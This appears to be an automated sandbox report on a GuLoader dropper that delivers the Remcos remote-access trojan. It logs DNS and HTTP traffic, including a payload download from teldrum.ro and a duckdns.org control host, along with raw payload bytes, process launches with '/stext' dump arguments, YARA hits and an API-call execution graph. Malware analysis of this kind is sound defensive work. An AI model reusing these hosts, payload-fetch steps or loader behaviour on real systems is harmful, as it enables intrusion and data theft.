                                                                                                                                                                                                                                    Jan 8, 2025 17:19:37.709307909 CET39814974843.226.229.196192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 17:13:11.879415989 CET | 56651 | 53 | 192.168.11.20 | 1.1.1.1
Jan 8, 2025 17:13:12.376782894 CET | 53 | 56651 | 1.1.1.1 | 192.168.11.20
Jan 8, 2025 17:13:15.226377010 CET | 52642 | 53 | 192.168.11.20 | 1.1.1.1
Jan 8, 2025 17:13:15.873150110 CET | 53 | 52642 | 1.1.1.1 | 192.168.11.20
Jan 8, 2025 17:13:19.285228014 CET | 52994 | 53 | 192.168.11.20 | 1.1.1.1
Jan 8, 2025 17:13:19.413477898 CET | 53 | 52994 | 1.1.1.1 | 192.168.11.20

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 17:13:11.879415989 CET | 192.168.11.20 | 1.1.1.1 | 0x5a70 | Standard query (0) | teldrum.ro | A (IP address) | IN (0x0001) | false
Jan 8, 2025 17:13:15.226377010 CET | 192.168.11.20 | 1.1.1.1 | 0x564c | Standard query (0) | wealthabundance01.duckdns.org | A (IP address) | IN (0x0001) | false
Jan 8, 2025 17:13:19.285228014 CET | 192.168.11.20 | 1.1.1.1 | 0xfad1 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 17:13:12.376782894 CET | 1.1.1.1 | 192.168.11.20 | 0x5a70 | No error (0) | teldrum.ro | | 109.99.162.14 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 17:13:15.873150110 CET | 1.1.1.1 | 192.168.11.20 | 0x564c | No error (0) | wealthabundance01.duckdns.org | | 43.226.229.196 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 17:13:19.413477898 CET | 1.1.1.1 | 192.168.11.20 | 0xfad1 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false

                                                                                                                                                                                                                                    • teldrum.ro
                                                                                                                                                                                                                                    • geoplugin.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49750 | 178.237.33.50 | 80 | 5524 | C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 17:13:19.630399942 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Jan 8, 2025 17:13:19.851737022 CET | 1171 | IN | HTTP/1.1 200 OK
date: Wed, 08 Jan 2025 16:13:19 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                                                                                                                                                                                                    Data Ascii: { "geoplugin_request":"185.246.209.154", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Chicago", "geoplugin_region":"Illinois", "geoplugin_regionCode":"IL", "geoplugin_regionName":"Illinois", "geoplugin_areaCode":"", "geoplugin_dmaCode":"602", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"41.871", "geoplugin_longitude":"-87.6289", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49747 | 109.99.162.14 | 443 | 5524 | C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-08 16:13:13 UTC | 168 | OUT | GET /PmprpeY34.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: teldrum.ro
Cache-Control: no-cache
2025-01-08 16:13:13 UTC | 223 | IN | HTTP/1.1 200 OK
Date: Wed, 08 Jan 2025 16:13:13 GMT
Server: Apache
Last-Modified: Wed, 08 Jan 2025 05:44:12 GMT
Accept-Ranges: bytes
Content-Length: 493632
Connection: close
Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Data Ascii: /6[ZD3Hq/J7GZZ1'"F<iIjk4:+?`M95`2@AQB}J]onH'8K=}hwd#$s2*i('}7a(o,VR)N{ACj^o"w5{u
                                                                                                                                                                                                                                    2025-01-08 16:13:14 UTC8000INData Raw: 2a 1a 75 47 c4 91 ce 89 97 df 10 b8 18 4f 61 32 e7 30 e6 92 f5 b0 19 e8 2a 86 91 48 eb 0f 3c ba 29 35 0a ca 83 2f ab d1 7d e4 5d 76 9b 72 7f 6a ce 10 4e 7f b3 f7 e3 ec a1 bf 38 ca e2 67 e6 80 db a9 42 52 b3 1e 50 73 42 8d 21 b7 ea 3d 6c a1 0e f4 91 9b f8 4b 10 7f 99 39 9c 81 40 c8 d0 bc b6 90 12 ff c7 fe ac f5 f1 9f f9 d3 09 e7 74 92 a5 e2 49 d2 78 82 64 2b 16 37 f9 83 76 bf 19 c2 f8 aa 54 56 41 54 9d 31 f3 ad 41 d5 aa 8c 85 7d 11 c3 9a f9 32 64 6d a0 c9 d0 d6 86 ff bb c7 76 a4 ec b3 d8 19 d8 a0 7a ce b0 d5 c8 c1 e8 1c 01 ec d6 ba 39 81 a0 e2 90 cb a9 9c ba e2 70 28 4b ec 45 d7 52 f9 d4 ba 6b 69 4e 87 79 78 33 13 37 2e bd c5 83 d4 54 6e 48 51 90 c2 8e fb 49 3e 6a 98 10 4a 8a 80 f1 d3 50 7d c6 24 2f 77 1a d4 b8 6c 36 38 ab 26 7b c1 70 28 25 53 d0 88 e5 e0
                                                                                                                                                                                                                                    Data Ascii: *uGOa20*H<)5/}]vrjN8gBRPsB!=lK9@tIxd+7vTVAT1A}2dmvz9p(KERkiNyx37.TnHQI>jJP}$/wl68&{p(%S
                                                                                                                                                                                                                                    2025-01-08 16:13:14 UTC8000INData Raw: d1 af 68 9c 51 bf 17 03 d8 bb d2 d5 30 91 10 dd f1 0c e3 8b 28 b1 48 3b c2 9a b8 3e d6 61 eb f8 a9 0a 6a 3f 19 48 ca 4d c5 ad 9c b8 6c 5b ea 85 40 84 3b 77 0d 26 99 bc a6 de 09 60 9b 46 c8 99 fe 94 d9 49 6e 3c 87 03 9c ed d7 f5 9a 72 54 4d 1a f2 fa 51 08 b9 0a 6b 3a d1 92 c1 d5 52 d3 3c 67 55 2d f2 33 39 61 f2 c8 fe 39 58 6c a4 74 0b 42 2d dc 16 5a 09 40 1e 90 ae 5c cf 5e f9 7b 03 7b e3 80 95 29 f2 b6 92 aa 15 11 28 4e 66 b3 83 07 78 4f 34 5b 3b e9 58 0d fc 4e cc cf 84 b9 9a 02 f8 bc 1f 5a 22 88 0e 66 8d ae 2e 53 ed 9f 3b 13 cd a3 59 6b 46 d4 c8 c6 e5 e1 35 00 5e d1 12 1a 70 18 d9 36 71 5a a2 c7 af 78 ec 18 8b 37 95 18 b6 7a 9b 2d d6 77 30 72 fe 06 22 46 61 ce 65 82 94 1e c5 8c 0c 69 32 ed d5 4d d0 b2 69 ec 0d c8 a3 ab 72 9c 59 14 43 75 73 02 25 12 f3 34
                                                                                                                                                                                                                                    Data Ascii: hQ0(H;>aj?HMl[@;w&`FIn<rTMQk:R<gU-39a9XltB-Z@\^{{)(NfxO4[;XNZ"f.S;YkF5^p6qZx7z-w0r"Faei2MirYCus%4



                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:11:10:57
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.27693002963.00000000028A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.27693286929.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.27693286929.00000000031B4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:11:12:09
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.32066409158.0000000032B2F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.29410654098.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.32053389316.0000000001764000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.32053389316.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.29410560082.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:11:13:25
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:11:13:25
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:11:13:25
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs"
Imagebase:0x400000
File size:408'484 bytes
MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Execution Graph

Execution Coverage:15.7%
Dynamic/Decrypted Code Coverage:13.9%
Signature Coverage:19.9%
Total number of Nodes:1515
Total number of Limit Nodes:40
API calls 4288 405b46 4285->4288 4286 405b71 lstrlenA 4287 405b7c 4286->4287 4286->4288 4290 405a31 3 API calls 4287->4290 4288->4284 4288->4286 4292 405a78 2 API calls 4288->4292 4452 40639c FindFirstFileA 4288->4452 4291 405b81 GetFileAttributesA 4290->4291 4291->4284 4292->4286 4293->4147 4294->4116 4296 403812 4295->4296 4297 403808 CloseHandle 4295->4297 4298 403826 4296->4298 4299 40381c CloseHandle 4296->4299 4297->4296 4455 403854 4298->4455 4299->4298 4305 4057ca 4304->4305 4306 40364d ExitProcess 4305->4306 4307 4057de MessageBoxIndirectA 4305->4307 4307->4306 4309 406431 5 API calls 4308->4309 4310 40365a lstrcatA 4309->4310 4310->4142 4310->4143 4312 40369c 4311->4312 4313 4056d7 GetLastError 4311->4313 4312->4155 4313->4312 4314 4056e6 SetFileSecurityA 4313->4314 4314->4312 4315 4056fc GetLastError 4314->4315 4315->4312 4317 405717 GetLastError 4316->4317 4318 405713 4316->4318 4317->4318 4318->4155 4319->4157 4320->4167 4322 405e8c 4321->4322 4324 405e99 4321->4324 4512 405d08 4322->4512 4324->4167 4326 405777 4325->4326 4327 40576b CloseHandle 4325->4327 4326->4167 4327->4326 4329 401389 2 API calls 4328->4329 4330 401420 4329->4330 4330->4128 4332 4032fa 4331->4332 4333 405a4b lstrcatA 4331->4333 4332->4187 4333->4332 4334->4193 4335->4195 4337 405a85 4336->4337 4338 402e04 4337->4338 4339 405a8a CharPrevA 4337->4339 4340 406099 lstrcpynA 4338->4340 4339->4337 4339->4338 4340->4199 4342 402d07 4341->4342 4343 402d1f 4341->4343 4346 402d10 DestroyWindow 4342->4346 4347 402d17 4342->4347 4344 402d27 4343->4344 4345 402d2f GetTickCount 4343->4345 4376 40646d 4344->4376 4345->4347 4349 402d3d 4345->4349 4346->4347 4347->4205 4347->4220 4375 4032c5 SetFilePointer 4347->4375 4350 402d72 CreateDialogParamA ShowWindow 4349->4350 4351 402d45 4349->4351 4350->4347 4351->4347 4380 402cdd 4351->4380 4353 402d53 wsprintfA 4383 4051c0 4353->4383 4356->4218 4358 403069 4357->4358 4359 40304d SetFilePointer 4357->4359 4394 403146 GetTickCount 4358->4394 4359->4358 
4362 405caa ReadFile 4363 403089 4362->4363 4364 403146 42 API calls 4363->4364 4366 403106 4363->4366 4365 4030a0 4364->4365 4365->4366 4367 40310c ReadFile 4365->4367 4369 4030af 4365->4369 4366->4220 4367->4366 4369->4366 4370 405caa ReadFile 4369->4370 4407 405cd9 WriteFile 4369->4407 4370->4369 4373 405caa ReadFile 4372->4373 4374 4032c2 4373->4374 4374->4201 4375->4210 4377 40648a PeekMessageA 4376->4377 4378 406480 DispatchMessageA 4377->4378 4379 40649a 4377->4379 4378->4377 4379->4347 4381 402cec 4380->4381 4382 402cee MulDiv 4380->4382 4381->4382 4382->4353 4384 402d70 4383->4384 4385 4051db 4383->4385 4384->4347 4386 4051f8 lstrlenA 4385->4386 4387 4060bb 17 API calls 4385->4387 4388 405221 4386->4388 4389 405206 lstrlenA 4386->4389 4387->4386 4391 405234 4388->4391 4392 405227 SetWindowTextA 4388->4392 4389->4384 4390 405218 lstrcatA 4389->4390 4390->4388 4391->4384 4393 40523a SendMessageA SendMessageA SendMessageA 4391->4393 4392->4391 4393->4384 4395 403174 4394->4395 4396 40329e 4394->4396 4409 4032c5 SetFilePointer 4395->4409 4397 402cf9 32 API calls 4396->4397 4403 403070 4397->4403 4399 40317f SetFilePointer 4404 4031a4 4399->4404 4400 4032af ReadFile 4400->4404 4402 402cf9 32 API calls 4402->4404 4403->4362 4403->4366 4404->4400 4404->4402 4404->4403 4405 405cd9 WriteFile 4404->4405 4406 40327f SetFilePointer 4404->4406 4410 406576 4404->4410 4405->4404 4406->4396 4408 405cf7 4407->4408 4408->4369 4409->4399 4411 40659b 4410->4411 4416 4065a3 4410->4416 4411->4404 4412 406633 GlobalAlloc 4412->4411 4412->4416 4413 40662a GlobalFree 4413->4412 4414 4066a1 GlobalFree 4415 4066aa GlobalAlloc 4414->4415 4415->4411 4415->4416 4416->4411 4416->4412 4416->4413 4416->4414 4416->4415 4417->4228 4419 403bc2 4418->4419 4434 405ff7 wsprintfA 4419->4434 4421 403c33 4435 403c67 4421->4435 4423 40396e 4423->4234 4424 403c38 4424->4423 4425 4060bb 17 API calls 4424->4425 4425->4424 4426->4236 4438 4041a6 4427->4438 4429 4052dc 4430 4041a6 SendMessageA 
4429->4430 4431 4052ee OleUninitialize 4430->4431 4431->4267 4432 4052b5 4432->4429 4441 401389 4432->4441 4434->4421 4436 4060bb 17 API calls 4435->4436 4437 403c75 SetWindowTextA 4436->4437 4437->4424 4439 4041be 4438->4439 4440 4041af SendMessageA 4438->4440 4439->4432 4440->4439 4443 401390 4441->4443 4442 4013fe 4442->4432 4443->4442 4444 4013cb MulDiv SendMessageA 4443->4444 4444->4443 4445->4281 4447 405ae5 4446->4447 4449 405af5 4446->4449 4448 405af0 CharNextA 4447->4448 4447->4449 4451 405b15 4448->4451 4450 405a5c CharNextA 4449->4450 4449->4451 4450->4449 4451->4284 4451->4285 4453 4063b2 FindClose 4452->4453 4454 4063bd 4452->4454 4453->4454 4454->4288 4456 403862 4455->4456 4457 40382b 4456->4457 4458 403867 FreeLibrary GlobalFree 4456->4458 4459 405861 4457->4459 4458->4457 4458->4458 4460 405b1f 18 API calls 4459->4460 4461 405881 4460->4461 4462 4058a0 4461->4462 4463 405889 DeleteFileA 4461->4463 4465 4059d8 4462->4465 4499 406099 lstrcpynA 4462->4499 4464 40362e OleUninitialize 4463->4464 4464->4124 4464->4125 4465->4464 4472 40639c 2 API calls 4465->4472 4467 4058c6 4468 4058d9 4467->4468 4469 4058cc lstrcatA 4467->4469 4471 405a78 2 API calls 4468->4471 4470 4058df 4469->4470 4474 4058ed lstrcatA 4470->4474 4476 4058f8 lstrlenA FindFirstFileA 4470->4476 4471->4470 4473 4059f2 4472->4473 4473->4464 4475 4059f6 4473->4475 4474->4476 4477 405a31 3 API calls 4475->4477 4478 4059ce 4476->4478 4483 40591c 4476->4483 4479 4059fc 4477->4479 4478->4465 4481 405819 5 API calls 4479->4481 4480 405a5c CharNextA 4480->4483 4482 405a08 4481->4482 4484 405a22 4482->4484 4485 405a0c 4482->4485 4483->4480 4486 4059ad FindNextFileA 4483->4486 4494 405861 60 API calls 4483->4494 4496 4051c0 24 API calls 4483->4496 4497 4051c0 24 API calls 4483->4497 4498 405e78 36 API calls 4483->4498 4500 406099 lstrcpynA 4483->4500 4501 405819 4483->4501 4488 4051c0 24 API calls 4484->4488 4485->4464 4490 4051c0 24 API calls 4485->4490 4486->4483 4489 4059c5 FindClose 
4486->4489 4488->4464 4489->4478 4491 405a19 4490->4491 4492 405e78 36 API calls 4491->4492 4495 405a20 4492->4495 4494->4483 4495->4464 4496->4486 4497->4483 4498->4483 4499->4467 4500->4483 4509 405c0d GetFileAttributesA 4501->4509 4504 405846 4504->4483 4505 405834 RemoveDirectoryA 4507 405842 4505->4507 4506 40583c DeleteFileA 4506->4507 4507->4504 4508 405852 SetFileAttributesA 4507->4508 4508->4504 4510 405825 4509->4510 4511 405c1f SetFileAttributesA 4509->4511 4510->4504 4510->4505 4510->4506 4511->4510 4513 405d54 GetShortPathNameA 4512->4513 4514 405d2e 4512->4514 4515 405e73 4513->4515 4516 405d69 4513->4516 4539 405c32 GetFileAttributesA CreateFileA 4514->4539 4515->4324 4516->4515 4519 405d71 wsprintfA 4516->4519 4518 405d38 CloseHandle GetShortPathNameA 4518->4515 4520 405d4c 4518->4520 4521 4060bb 17 API calls 4519->4521 4520->4513 4520->4515 4522 405d99 4521->4522 4540 405c32 GetFileAttributesA CreateFileA 4522->4540 4524 405da6 4524->4515 4525 405db5 GetFileSize GlobalAlloc 4524->4525 4526 405dd7 4525->4526 4527 405e6c CloseHandle 4525->4527 4528 405caa ReadFile 4526->4528 4527->4515 4529 405ddf 4528->4529 4529->4527 4541 405b97 lstrlenA 4529->4541 4532 405df6 lstrcpyA 4535 405e18 4532->4535 4533 405e0a 4534 405b97 4 API calls 4533->4534 4534->4535 4536 405e4f SetFilePointer 4535->4536 4537 405cd9 WriteFile 4536->4537 4538 405e65 GlobalFree 4537->4538 4538->4527 4539->4518 4540->4524 4542 405bd8 lstrlenA 4541->4542 4543 405be0 4542->4543 4544 405bb1 lstrcmpiA 4542->4544 4543->4532 4543->4533 4544->4543 4545 405bcf CharNextA 4544->4545 4545->4542 5460 401490 5461 4051c0 24 API calls 5460->5461 5462 401497 5461->5462 5463 401d95 GetDC 5464 402a9f 17 API calls 5463->5464 5465 401da7 GetDeviceCaps MulDiv ReleaseDC 5464->5465 5466 402a9f 17 API calls 5465->5466 5467 401dd8 5466->5467 5468 4060bb 17 API calls 5467->5468 5469 401e15 CreateFontIndirectA 5468->5469 5470 402577 5469->5470 5471 10001058 5473 10001074 5471->5473 5472 100010dc 5473->5472 5474 
100014bb GlobalFree 5473->5474 5475 10001091 5473->5475 5474->5475 5476 100014bb GlobalFree 5475->5476 5477 100010a1 5476->5477 5478 100010b1 5477->5478 5479 100010a8 GlobalSize 5477->5479 5480 100010b5 GlobalAlloc 5478->5480 5482 100010c6 5478->5482 5479->5478 5481 100014e2 3 API calls 5480->5481 5481->5482 5483 100010d1 GlobalFree 5482->5483 5483->5472 5491 401d1a 5492 402a9f 17 API calls 5491->5492 5493 401d28 SetWindowLongA 5492->5493 5494 402951 5493->5494 5495 40491b 5496 404947 5495->5496 5497 40492b 5495->5497 5499 40497a 5496->5499 5500 40494d SHGetPathFromIDListA 5496->5500 5506 405799 GetDlgItemTextA 5497->5506 5501 404964 SendMessageA 5500->5501 5502 40495d 5500->5502 5501->5499 5504 40140b 2 API calls 5502->5504 5503 404938 SendMessageA 5503->5496 5504->5501 5506->5503 4836 40159d 4837 402ac1 17 API calls 4836->4837 4838 4015a4 SetFileAttributesA 4837->4838 4839 4015b6 4838->4839 5512 40149d 5513 4022e1 5512->5513 5514 4014ab PostQuitMessage 5512->5514 5514->5513 5515 401a1e 5516 402ac1 17 API calls 5515->5516 5517 401a27 ExpandEnvironmentStringsA 5516->5517 5518 401a3b 5517->5518 5520 401a4e 5517->5520 5519 401a40 lstrcmpA 5518->5519 5518->5520 5519->5520 5521 40171f 5522 402ac1 17 API calls 5521->5522 5523 401726 SearchPathA 5522->5523 5524 401741 5523->5524 5525 100010e0 5528 1000110e 5525->5528 5526 100011c4 GlobalFree 5527 100012ad 2 API calls 5527->5528 5528->5526 5528->5527 5529 100011c3 5528->5529 5530 100011ea GlobalFree 5528->5530 5531 10001266 2 API calls 5528->5531 5532 10001155 GlobalAlloc 5528->5532 5533 100012d1 lstrcpyA 5528->5533 5534 100011b1 GlobalFree 5528->5534 5529->5526 5530->5528 5531->5534 5532->5528 5533->5528 5534->5528 5535 10002162 5536 100021c0 5535->5536 5537 100021f6 5535->5537 5536->5537 5538 100021d2 GlobalAlloc 5536->5538 5538->5536 5539 4042a3 5540 4042b9 5539->5540 5544 4043c5 5539->5544 5542 40415a 18 API calls 5540->5542 5541 404434 5543 40443e GetDlgItem 5541->5543 5546 4044fe 5541->5546 5545 40430f 5542->5545 
5547 404454 5543->5547 5548 4044bc 5543->5548 5544->5541 5544->5546 5549 404409 GetDlgItem SendMessageA 5544->5549 5550 40415a 18 API calls 5545->5550 5551 4041c1 8 API calls 5546->5551 5547->5548 5553 40447a SendMessageA LoadCursorA SetCursor 5547->5553 5548->5546 5554 4044ce 5548->5554 5572 40417c EnableWindow 5549->5572 5556 40431c CheckDlgButton 5550->5556 5552 4044f9 5551->5552 5573 404547 5553->5573 5558 4044d4 SendMessageA 5554->5558 5559 4044e5 5554->5559 5570 40417c EnableWindow 5556->5570 5558->5559 5559->5552 5564 4044eb SendMessageA 5559->5564 5560 40442f 5565 404523 SendMessageA 5560->5565 5562 40433a GetDlgItem 5571 40418f SendMessageA 5562->5571 5564->5552 5565->5541 5567 404350 SendMessageA 5568 404377 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5567->5568 5569 40436e GetSysColor 5567->5569 5568->5552 5569->5568 5570->5562 5571->5567 5572->5560 5576 40577b ShellExecuteExA 5573->5576 5575 4044ad LoadCursorA SetCursor 5575->5548 5576->5575 5577 401e25 5578 402a9f 17 API calls 5577->5578 5579 401e2b 5578->5579 5580 402a9f 17 API calls 5579->5580 5581 401e37 5580->5581 5582 401e43 ShowWindow 5581->5582 5583 401e4e EnableWindow 5581->5583 5584 402951 5582->5584 5583->5584 5585 406725 5586 4065a9 5585->5586 5587 406f14 5586->5587 5588 406633 GlobalAlloc 5586->5588 5589 40662a GlobalFree 5586->5589 5590 4066a1 GlobalFree 5586->5590 5591 4066aa GlobalAlloc 5586->5591 5588->5586 5588->5587 5589->5588 5590->5591 5591->5586 5591->5587 5592 4064a6 WaitForSingleObject 5593 4064c0 5592->5593 5594 4064d2 GetExitCodeProcess 5593->5594 5595 40646d 2 API calls 5593->5595 5596 4064c7 WaitForSingleObject 5595->5596 5596->5593 5597 4038a7 5598 4038b2 5597->5598 5599 4038b9 GlobalAlloc 5598->5599 5600 4038b6 5598->5600 5599->5600 5601 401f2b 5602 402ac1 17 API calls 5601->5602 5603 401f32 5602->5603 5604 40639c 2 API calls 5603->5604 5605 401f38 5604->5605 5607 401f4a 5605->5607 5608 405ff7 wsprintfA 5605->5608 5608->5607 5609 40292c SendMessageA 5610 
